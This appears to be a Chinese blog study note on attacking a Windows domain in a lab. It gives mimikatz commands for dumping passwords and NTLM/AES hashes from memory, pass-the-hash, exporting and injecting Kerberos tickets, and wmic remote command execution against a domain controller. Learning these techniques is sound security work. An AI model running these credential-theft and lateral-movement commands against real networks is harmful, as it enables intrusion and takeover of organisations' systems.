域内安全

mimikatz在内网中使用

一般来说域环境里面，用户信息在ntds.dit,加密后为散列值

LM Hash,NTLM Hash

user1:RID:LM-HASH:NT-HASH

NTML 基于md4

打开linux

使用mimikatz传到靶机
进入shell
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords" //把所有能搜集到的用户名密码明文读取

在win2008之后就不太好使了

pass the hash

另开一个win2012，是域里面的一台主机，假设已经入侵成功

使用mimikatz获得域控的NTLM hash值
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords"
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:test1.com /ntlm:hash值"

弹出一个cmd框，在框里输入

dir \\dc-1\c$
type \\dc-1\c$a.txt

发现可以控制域控了

进入下一种方式

shell
cd x64
mimikatz "privilege::debug" "sekurlsa::ekeys" //看到aes256的hash
aes256也可以pass the hash
mimikatz "privilege::debug" "sekurlsa::pth /user:test2 /domain:test1.com /aes256:hash"
又新建一个cmd

票据传递

进入mimikatz，先票据导出

mimikatz
privilege::debug
sekurlsa::tickets /export

内存中票据清理

kerberos::purge

拿到票据该怎么使用

mimikatz "kerberos::ptt" c:\x64\你要用的票据文件.kirbi
把票据注入到内存中

在本cmd中

dir \\dc-1\c$
直接进行访问

wmic命令执行

进入一个system权限的session

shell
wmic /node:域控ip /user:test2 /password:test123! process call create "cmd.exe /c ipconfig > c:\ip.txt"
exit
migrate //查看进程
migrate 进程号
dir \\dc-1\c$

推荐文章（由hexo文章推荐插件驱动）

• 攻防世界WEB篇
• Mysql 身份认证绕过漏洞(CVE-2012-2122)
• Xss获取cookie
• 加密QQ空间强行爆破工具V1.0